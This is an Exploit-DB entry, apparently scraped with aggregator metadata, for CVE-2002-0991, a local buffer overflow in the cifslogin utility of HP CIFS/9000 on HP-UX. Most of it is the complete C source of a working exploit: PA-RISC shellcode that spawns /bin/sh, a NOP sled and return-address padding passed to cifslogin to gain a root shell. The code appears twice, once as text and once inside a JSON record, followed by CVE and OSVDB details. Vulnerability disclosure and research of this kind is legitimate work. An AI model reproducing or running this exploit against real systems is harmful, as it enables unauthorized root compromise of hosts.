HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow Vulnerability
2002-11-06T00:00:00
ID EDB-ID:21577 Type exploitdb Reporter watercloud Modified 2002-11-06T00:00:00
Description
HP CIFS/9000 Server A.01.05/A.01.06 Buffer Overflow Vulnerability. CVE-2002-0991 . Local exploit for hp-ux platform
source: http://www.securityfocus.com/bid/5088/info
A vulnerability has been reported in the /opt/cifsclient/bin/cifslogin utility distributed with CIFS/9000. The utility is prone to several buffer overflow conditions and may lead to root compromise.
The vulnerability occurs due to the lack of bounds checking when accepting user input for various commandline options. Specifically, the utility fails to check for excessively long arguments to the following commandline options: '-U', '-D', '-P', '-S', '-N', and '-u'.
/*
Name : ex_cifslogin.c
Compile : cc ex_cifslogin -o cifslogin
Purpose : exploit cifslogin command for HP-UX 11.11 11.0 10.20��to get root shell
Author : watercloud < safesuite@263.net, watercloud@xfocus.net >
Date : 2002-11-6
Announce: Use as your own risk��
Thanks : bear < bearundertree@163.com >
Tested : HPUX B11.11
*/
#include<stdio.h>
#define T_LEN 2304
#define BUFF_LEN 2176
#define NOP 0x0b390280
char shellcode[]=
"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
long addr;
char buffer[T_LEN];
main()
{
int addr_off =800 ;
int n=BUFF_LEN/4,i=0;
long * ap = (long *) &buffer[BUFF_LEN];
char * sp = &buffer[BUFF_LEN-strlen(shellcode)];
long * np = (long *) buffer;
addr = ((long) &addr_off + T_LEN ) & 0xffffff40 +0x40 ;
for(i=0;i<n;np[i++]=NOP);
memcpy(sp,shellcode,strlen(shellcode));
for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr+addr_off);
printf("SP=0x%x EXP_SP=0x%x OFF=0x%x (%i)\n",(long)&addr_off & 0xffffff40,addr,addr_off);
printf("Addr =0x%x NOP_LEN=%i\n",addr+addr_off,BUFF_LEN-strlen(shellcode));
printf("BUFFER_LEN=%i\n",strlen(buffer));
execl("/opt/cifsclient/bin/cifslogin","cifslogin","123",buffer,NULL);
}
{"published": "2002-11-06T00:00:00", "id": "EDB-ID:21577", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "bbd9ad91dbb872b504f3f7044cfbdbd82f3fdbc604676ad0beb42b00f3d4da00", "description": "HP CIFS/9000 Server A.01.05/A.01.06 Buffer Overflow Vulnerability. CVE-2002-0991 . Local exploit for hp-ux platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/21577/", "lastseen": "2016-02-02T16:48:27", "edition": 1, "title": "HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow Vulnerability", "osvdbidlist": ["11362"], "modified": "2002-11-06T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0991"], "sourceHref": "https://www.exploit-db.com/download/21577/", "references": [], "reporter": "watercloud", "sourceData": "source: http://www.securityfocus.com/bid/5088/info\r\n\r\nA vulnerability has been reported in the /opt/cifsclient/bin/cifslogin utility distributed with CIFS/9000. The utility is prone to several buffer overflow conditions and may lead to root compromise.\r\n\r\nThe vulnerability occurs due to the lack of bounds checking when accepting user input for various commandline options. Specifically, the utility fails to check for excessively long arguments to the following commandline options: '-U', '-D', '-P', '-S', '-N', and '-u'.\r\n\r\n/*\r\nName : ex_cifslogin.c\r\nCompile : cc ex_cifslogin -o cifslogin\r\nPurpose : exploit cifslogin command for HP-UX 11.11 11.0 10.20\ufffd\ufffdto get root shell\r\nAuthor : watercloud < safesuite@263.net, watercloud@xfocus.net >\r\nDate : 2002-11-6\r\nAnnounce: Use as your own risk\ufffd\ufffd\r\nThanks : bear < bearundertree@163.com >\r\nTested : HPUX B11.11\r\n*/\r\n#include<stdio.h>\r\n\r\n#define T_LEN 2304\r\n#define BUFF_LEN 2176\r\n#define NOP 0x0b390280\r\n\r\nchar shellcode[]=\r\n \"\\xe8\\x3f\\x1f\\xfd\\xb4\\x23\\x03\\xe8\\x60\\x60\\x3c\\x61\\x0b\\x39\\x02\"\r\n \"\\x99\\x34\\x1a\\x3c\\x53\\x0b\\x43\\x06\\x1a\\x20\\x20\\x08\\x01\\x34\\x16\\x03\"\r\n \"\\xe8\\xe4\\x20\\xe0\\x08\\x96\\xd6\\x03\\xfe/bin/shA\";\r\nlong addr;\r\nchar buffer[T_LEN];\r\n\r\nmain()\r\n{\r\n int addr_off =800 ;\r\n\r\n int n=BUFF_LEN/4,i=0;\r\n long * ap = (long *) &buffer[BUFF_LEN];\r\n char * sp = &buffer[BUFF_LEN-strlen(shellcode)];\r\n long * np = (long *) buffer;\r\n\r\n addr = ((long) &addr_off + T_LEN ) & 0xffffff40 +0x40 ;\r\n\r\n for(i=0;i<n;np[i++]=NOP);\r\n memcpy(sp,shellcode,strlen(shellcode));\r\n for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr+addr_off);\r\n\r\n printf(\"SP=0x%x EXP_SP=0x%x OFF=0x%x (%i)\\n\",(long)&addr_off & 0xffffff40,addr,addr_off);\r\n printf(\"Addr =0x%x NOP_LEN=%i\\n\",addr+addr_off,BUFF_LEN-strlen(shellcode));\r\n printf(\"BUFFER_LEN=%i\\n\",strlen(buffer));\r\n\r\n execl(\"/opt/cifsclient/bin/cifslogin\",\"cifslogin\",\"123\",buffer,NULL);\r\n}\r\n\r\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2002-0991", "type": "cve", "title": "CVE-2002-0991", "description": "Buffer overflows in the cifslogin command for HP CIFS/9000 Client A.01.06 and earlier, based on the Sharity package, allows local users to gain root privileges via long (1) -U, (2) -D, (3) -P, (4) -S, (5) -N, or (6) -u parameters.", "published": "2002-10-04T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0991", "cvelist": ["CVE-2002-0991"], "lastseen": "2016-09-03T03:30:44"}], "osvdb": [{"id": "OSVDB:11362", "type": "osvdb", "title": "HP CIFS/9000 cifslogin Multiple Parameter Overflow", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-06/0300.html\nISS X-Force ID: 9431\n[CVE-2002-0991](https://vulners.com/cve/CVE-2002-0991)\nBugtraq ID: 5088\n", "published": "2002-06-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:11362", "cvelist": ["CVE-2002-0991"], "lastseen": "2017-04-28T13:20:06"}]}}